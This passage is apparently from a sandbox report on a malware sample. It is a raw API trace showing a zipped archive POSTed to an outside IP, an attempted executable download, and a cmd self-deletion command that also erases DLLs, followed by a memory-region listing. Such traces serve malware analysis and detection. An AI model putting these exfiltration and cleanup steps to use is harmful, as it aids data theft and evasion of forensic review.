lpNumberOfBytesWritten=0x19f664, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f664*=0x1, lpOverlapped=0x0) returned 1 [0116.640] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f658, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f658*=0x1, lpOverlapped=0x0) returned 1 [0116.640] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f64c, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f64c*=0x1, lpOverlapped=0x0) returned 1 [0116.640] WriteFile (in: hFile=0x358, lpBuffer=0x19f69c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f640, lpOverlapped=0x0 | out: lpBuffer=0x19f69c*, lpNumberOfBytesWritten=0x19f640*=0x1, lpOverlapped=0x0) returned 1 [0116.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38efa28 | out: hHeap=0x29a0000) returned 1 [0116.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb988 | out: hHeap=0x29a0000) returned 1 [0116.641] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68d8 | out: hHeap=0x29a0000) returned 1 [0116.645] CreateFileA (lpFileName="03845cb8-7441-4a2f-8c0f-c90408af57783083953543.zip" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\03845cb8-7441-4a2f-8c0f-c90408af57783083953543.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0116.731] GetFileSize (in: hFile=0x358, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ebbe [0116.731] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0116.737] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0116.741] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0116.741] ReadFile (in: hFile=0x358, lpBuffer=0x38703c2, nNumberOfBytesToRead=0x2ebbe, lpNumberOfBytesRead=0x19f66c, lpOverlapped=0x0 | out: lpBuffer=0x38703c2*, lpNumberOfBytesRead=0x19f66c*=0x2ebbe, lpOverlapped=0x0) returned 1 [0116.748] CloseHandle (hObject=0x358) returned 1 [0116.753] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0116.756] GetLastError () returned 0x0 [0116.757] SetLastError (dwErrCode=0x0) [0116.761] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0116.762] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f538, dwBufferLength=0x4) returned 1 [0116.762] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0116.763] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0116.763] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0116.764] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a8f68 [0116.764] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0116.764] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0116.764] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0116.764] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0116.764] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a8f68 | out: hHeap=0x29a0000) returned 1 [0116.764] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970f40 [0116.764] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x47) returned 0x38eb888 [0116.765] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0116.765] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0116.765] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 192339", dwHeadersLength=0x16, dwModifiers=0x20000000) returned 1 [0116.765] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x3870048*, dwOptionalLength=0x2ef53) returned 1 [0117.397] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x2e, lpBuffer=0x19f5c8, lpdwBufferLength=0x19f534, lpdwIndex=0x0 | out: lpBuffer=0x19f5c8, lpdwBufferLength=0x19f534, lpdwIndex=0x0) returned 0 [0117.398] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.398] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab020, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f3b8 | out: lpBuffer=0x3cab020*, lpdwNumberOfBytesRead=0x19f3b8*=0x2) returned 1 [0117.398] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab022, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f3b8 | out: lpBuffer=0x3cab022*, lpdwNumberOfBytesRead=0x19f3b8*=0x0) returned 1 [0117.398] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f400, lpdwBufferLength=0x19f3b8, lpdwIndex=0x0 | out: lpBuffer=0x19f400, lpdwBufferLength=0x19f3b8, lpdwIndex=0x0) returned 0 [0117.399] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0117.399] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb888 | out: hHeap=0x29a0000) returned 1 [0117.399] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0117.399] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0117.399] DeleteFileA (lpFileName="03845cb8-7441-4a2f-8c0f-c90408af57783083953543.zip" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\03845cb8-7441-4a2f-8c0f-c90408af57783083953543.zip")) returned 1 [0117.402] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x7a120) returned 0x3970f40 [0117.411] GetLastError () returned 0x0 [0117.411] SetLastError (dwErrCode=0x0) [0117.411] lstrcatA (in: lpString1="", lpString2="C:\\ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0117.411] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970048 [0117.411] Sleep (dwMilliseconds=0x64) [0117.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f29c | out: lpSystemTimeAsFileTime=0x19f29c*(dwLowDateTime=0x3a13c62b, dwHighDateTime=0x1d7b3bd)) [0117.517] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a6808 [0117.517] GetTickCount () returned 0x1230dc4 [0117.517] GetLastError () returned 0x0 [0117.518] SetLastError (dwErrCode=0x0) [0117.518] GetLastError () returned 0x0 [0117.518] SetLastError (dwErrCode=0x0) [0117.521] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.522] GetLastError () returned 0x0 [0117.522] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.523] SetLastError (dwErrCode=0x0) [0117.523] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.524] SetLastError (dwErrCode=0x0) [0117.524] GetLastError () returned 0x0 [0117.525] SetLastError (dwErrCode=0x0) [0117.525] GetLastError () returned 0x0 [0117.525] SetLastError (dwErrCode=0x0) [0117.525] GetLastError () returned 0x0 [0117.525] SetLastError (dwErrCode=0x0) [0117.525] GetLastError () returned 0x0 [0117.525] SetLastError (dwErrCode=0x0) [0117.525] GetLastError () returned 0x0 [0117.525] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.529] SetLastError (dwErrCode=0x0) [0117.529] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] GetLastError () returned 0x0 [0117.530] SetLastError (dwErrCode=0x0) [0117.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0117.530] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0117.530] lstrcatA (in: lpString1="C:\\ProgramData\\", lpString2="G8DHDTNRQRGN7LW1" | out: lpString1="C:\\ProgramData\\G8DHDTNRQRGN7LW1") returned="C:\\ProgramData\\G8DHDTNRQRGN7LW1" [0117.530] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0117.530] lstrcatA (in: lpString1="C:\\ProgramData\\G8DHDTNRQRGN7LW1", lpString2=".exe" | out: lpString1="C:\\ProgramData\\G8DHDTNRQRGN7LW1.exe") returned="C:\\ProgramData\\G8DHDTNRQRGN7LW1.exe" [0117.530] GetLastError () returned 0x0 [0117.531] SetLastError (dwErrCode=0x0) [0117.531] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0117.531] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f2b0, dwBufferLength=0x4) returned 1 [0117.531] InternetConnectA (hInternet=0xcc0004, lpszServerName="ok", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0117.531] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0117.531] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a9980 [0117.531] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0117.531] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0117.531] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0117.531] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0117.531] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a9980 | out: hHeap=0x29a0000) returned 1 [0117.531] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0119.804] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0119.804] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0119.804] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0119.804] GetLastError () returned 0x0 [0119.804] SetLastError (dwErrCode=0x0) [0119.804] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f40 | out: hHeap=0x29a0000) returned 1 [0119.804] CoUninitialize () [0119.808] SetCurrentDirectoryA (lpPathName="C:\\ProgramData" (normalized: "c:\\programdata")) returned 1 [0119.810] SHFileOperationA (in: lpFileOp=0x19f6bc*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1", pTo="", fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0xb6c40000, lpszProgressTitle=0x4b) | out: lpFileOp=0x19f6bc*(hwnd=0x0, wFunc=0x3, pFrom="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1", pTo="", fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0xb6c40000, lpszProgressTitle=0x4b)) returned 2 [0119.903] GetCurrentProcessId () returned 0x5bc [0119.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5bc) returned 0x548 [0119.903] GetModuleFileNameExA (in: hProcess=0x548, hModule=0x0, lpFilename=0x19f4e4, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0119.903] CloseHandle (hObject=0x548) returned 1 [0119.903] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x3970048 [0119.903] GetCurrentProcessId () returned 0x5bc [0119.903] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5bc) returned 0x548 [0119.903] EnumProcessModules (in: hProcess=0x548, lphModule=0x19f4cc, cb=0x4, lpcbNeeded=0x19f4c8 | out: lphModule=0x19f4cc, lpcbNeeded=0x19f4c8) returned 1 [0119.905] GetModuleBaseNameA (in: hProcess=0x548, hModule=0x400000, lpBaseName=0x19f4e0, nSize=0x104 | out: lpBaseName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned 0x44 [0119.905] CloseHandle (hObject=0x548) returned 1 [0119.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38ead68 [0119.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x77) returned 0x29a04a0 [0119.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ead68 | out: hHeap=0x29a0000) returned 1 [0119.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xe0) returned 0x29a11c0 [0119.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0119.905] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x14f) returned 0x29aac90 [0119.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0119.905] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0119.905] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Windows\\System32\\cmd.exe", lpParameters="/c taskkill /im f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe /f & timeout /t 6 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" & del C:\\ProgramData\\*.dll & exit", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0120.453] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac90 | out: hHeap=0x29a0000) returned 1 [0120.453] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb248 | out: hHeap=0x29a0000) returned 1 [0120.453] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1078 | out: hHeap=0x29a0000) returned 1 [0120.453] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3870048 | out: hHeap=0x29a0000) returned 1 [0120.453] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3cab020 | out: hHeap=0x29a0000) returned 1 [0120.466] CoUninitialize () [0120.467] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0120.467] Sleep (dwMilliseconds=0x6f) [0120.611] Sleep (dwMilliseconds=0x22b) [0122.630] Sleep (dwMilliseconds=0x14d) [0123.210] Sleep (dwMilliseconds=0x6f) [0123.965] Sleep (dwMilliseconds=0x22b) [0124.849] Sleep (dwMilliseconds=0x14d) [0125.469] Sleep (dwMilliseconds=0x6f) [0125.622] Sleep (dwMilliseconds=0x22b) [0126.923] Sleep (dwMilliseconds=0x14d) [0127.269] Sleep (dwMilliseconds=0x6f) [0127.703] Sleep (dwMilliseconds=0x22b) [0128.604] Sleep (dwMilliseconds=0x14d) [0129.282] Sleep (dwMilliseconds=0x6f) [0129.706] Sleep (dwMilliseconds=0x22b) [0130.739] Sleep (dwMilliseconds=0x14d) [0131.364] Sleep (dwMilliseconds=0x6f) [0131.511] Sleep (dwMilliseconds=0x22b) [0132.101] Sleep (dwMilliseconds=0x14d) [0132.470] Sleep (dwMilliseconds=0x6f) Thread: id = 2 os_tid = 0x460 Thread: id = 3 os_tid = 0x6ac Thread: id = 4 os_tid = 0xdd4 Thread: id = 5 os_tid = 0xea8 Thread: id = 6 os_tid = 0x838 Thread: id = 7 os_tid = 0x42c Thread: id = 8 os_tid = 0xe04 Thread: id = 13 os_tid = 0xee8 Thread: id = 24 os_tid = 0x1398 Thread: id = 28 os_tid = 0xe10 Thread: id = 32 os_tid = 0x1c8 Thread: id = 36 os_tid = 0xce0 Process: id = "2" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x5b6bf000" os_pid = "0x13e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 748" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 381 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 382 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 383 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 384 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 385 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 386 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 387 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 388 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 389 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 390 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 391 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 392 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 393 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 394 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 395 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 396 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 397 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 398 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 399 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 400 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 401 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 402 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 403 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 404 start_va = 0x400000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 405 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 406 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 407 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 408 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 409 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 410 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 411 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 412 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 413 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 414 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 415 start_va = 0x754b0000 end_va = 